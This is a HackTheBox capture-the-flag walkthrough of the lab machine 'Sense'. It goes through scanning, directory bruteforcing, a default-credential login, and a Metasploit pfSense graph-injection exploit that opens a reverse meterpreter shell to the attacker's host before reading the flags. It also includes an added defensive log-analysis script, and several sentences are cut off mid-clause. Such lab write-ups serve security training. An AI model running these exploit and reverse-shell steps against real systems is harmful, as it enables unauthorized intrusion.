Sense HackTheBox WalkThrough
This is a walkthrough of the Sense HackTheBox machine, which is also the 18th machine of our OSCP like HTB Boxes series. In this writeup I demonstrate step by step how I rooted the Sense HackTheBox machine. But before diving into the hacking part, let us learn something about this box. It is a FreeBSD machine with IP address 10.10.10.60 and difficulty easy, as assigned by its maker.
Since this machine is retired on the HackTheBox platform, you will require a VIP subscription to access it. First of all, connect your Kali/Parrot machine to the HackTheBox VPN and confirm your connectivity by pinging the machine's IP address 10.10.10.60. If all goes well, start hacking.
As usual I started by scanning the machine with Nmap. Scanning gives us an idea of how to proceed: it finds open and closed ports and gives us information about the services running on them. I used Nmap for this task and the result is given below:
$ nmap -sC -sV -oA nmap/sense 10.10.10.60
$ cat nmap/sense.nmap
Nmap found port 443 as open. Let us enumerate on these ports.
Lighttpd 1.4.35 web server is running on port 80. Let us export our sense.xml file which is created by nmap’s switch $searchsploit (tool to query exploit-db offline) to check for available exploits on
Searching Available Exploits
$ searchsploit --nmap nmap/sense.xml
Searchsploit found multiple exploits for Lighttpd, but no suitable exploit is present for our current version. Since a web server is running on ports 80 and 443, there must be some website running at the URLs http://10.10.10.60 and https://10.10.10.60. On going to the URL http://10.10.10.60 I got redirected to https://10.10.10.60 and found a login page of pfSense (pfSense is an open source firewall/router computer software distribution based on FreeBSD).
Since it is the login page of a well-known web application, my usual next step is to log in with some default credential like kfsense, because sometimes admins forget to update the default credentials of the application. I did the same this time too, but none of them worked. I checked the page source by pressing CTRL+U for some kind of hint but found nothing interesting. So nothing was left except directory bruteforcing and fuzzing.
Then I performed directory bruteforcing on the URL https://10.10.10.60/ using $gobuster (directory bruteforcer) along with the extension txt and the wordlist directory-list-2.3-medium.txt (this wordlist can be found in
Performing Directory Bruteforcing
$ gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -k -u https://10.10.10.60 -n -x txt -t 50 -s 200
Directory bruteforcing found two system-users.txt. On visiting system-users.txt at http://10.10.10.60/system-users.txt I found some information about a username and password. Rohit and the password points to the default password of the company. After some googling, I found that the default password of pfsense is pfsense. When I tried to log in with the credential pfsense at https://10.10.10.60/ the login was successful. The installed version of pfsense is
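Seen from the defender's side, the gobuster sweep and the resulting fetch of system-users.txt leave a clear trail in the web server's access log. The following is an added example, not part of the original walkthrough: it flags clients whose requests are almost all 404s and lists the watched files they retrieved successfully. The log layout, thresholds, extension list, user-agent strings and the 192.0.2.10 client are assumptions, and all log lines are constructed.

```python
import re
from collections import defaultdict

# Assumed access-log layout: client, vhost, user, [time], "request", status, bytes, ...
LINE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                  r'"[A-Z]+ (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
# Extensions that rarely belong in a firewall's web root (hypothetical watch list).
WATCHED_EXT = (".txt", ".bak", ".old", ".sql", ".conf")

def constructed_log():
    """Constructed sample lines: one wordlist sweep and one ordinary browser."""
    fmt = ('{ip} 10.10.10.60 - [01/Jan/2024:10:00:{s:02d} +0000] '
           '"GET {p} HTTP/1.1" {c} 512 "-" "{ua}"')
    lines = []
    words = ["admin", "backup", "login", "images", "config", "test", "old", "docs"]
    for i, w in enumerate(words):  # every word is also tried with the txt extension
        for p in ("/" + w, "/" + w + ".txt"):
            lines.append(fmt.format(ip="10.10.14.3", s=i, p=p, c=404, ua="scanner"))
    lines.append(fmt.format(ip="10.10.14.3", s=9, p="/system-users.txt", c=200, ua="scanner"))
    for i, (p, c) in enumerate([("/index.php", 200), ("/css/main.css", 200), ("/favicon.ico", 404)]):
        lines.append(fmt.format(ip="192.0.2.10", s=20 + i, p=p, c=c, ua="browser"))
    return lines

def analyse(lines, min_404=10, min_ratio=0.8):
    """Return clients whose traffic looks like forced browsing, with the files they found."""
    stats = defaultdict(lambda: {"total": 0, "not_found": 0, "hits": set()})
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # skip lines that do not fit the assumed layout
        s = stats[m["ip"]]
        s["total"] += 1
        path = m["path"].split("?", 1)[0].lower()
        if m["status"] == "404":
            s["not_found"] += 1
        elif m["status"] == "200" and path.endswith(WATCHED_EXT):
            s["hits"].add(path)
    report = {}
    for ip, s in stats.items():
        if s["not_found"] >= min_404 and s["not_found"] / s["total"] >= min_ratio:
            report[ip] = {"requests": s["total"], "not_found": s["not_found"],
                          "exposed_files": sorted(s["hits"])}
    return report

if __name__ == "__main__":
    for ip, info in analyse(constructed_log()).items():
        print(ip, info)
```

Any path that shows up under exposed_files is worth removing from the web root, and any credential it contained should be rotated.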
As soon as I get information about an application and its version, my next step is to search the internet for available vulnerabilities and exploits. This time I used the Exploit Search Engine https://sploitus.com . It listed multiple authenticated RCE exploits, and there is also a Metasploit module present. After searching for pfsense in Metasploit I found the exploit/unix/http/pfsense_graph_injection_exec module, which worked and got me a shell. There are also other ways to exploit this vulnerability without Metasploit. You can mirror the exploit from exploit-db using $searchsploit with the command $ searchsploit -m php/webapps/43560.py or download it from the Packetstormsecurity website.
Let us get a user shell using Metasploit.
Getting User Shell
msf6 > search pfsense
msf6 > use exploit/unix/http/pfsense_graph_injection_exec
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set RHOSTS 10.10.10.60
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set USERNAME rohit
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set PASSWORD pfsense
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/meterpreter/reverse_tcp
msf6 exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 10.10.14.3
msf6 exploit(unix/http/pfsense_graph_injection_exec) > exploit
meterpreter > sysinfo
meterpreter > getuid
We have got a shell, and with root user privileges at that, which means we don’t have to perform the Privilege Escalation we usually do. The root user is just like God in a UNIX-like OS. Let us capture the user and root flags.
Capture User Flag
meterpreter > cat /home/rohit/user.txt
Capture Root Flag
meterpreter > cat /root/root.txt
This was how I rooted the Pfsense HackTheBox machine. I hope you have learned something from this machine walkthrough. Feel free to ask your doubts in the comment section if you have any. Thanks for reading this article. For any query or suggestion related to the walkthrough, contact us at [email protected].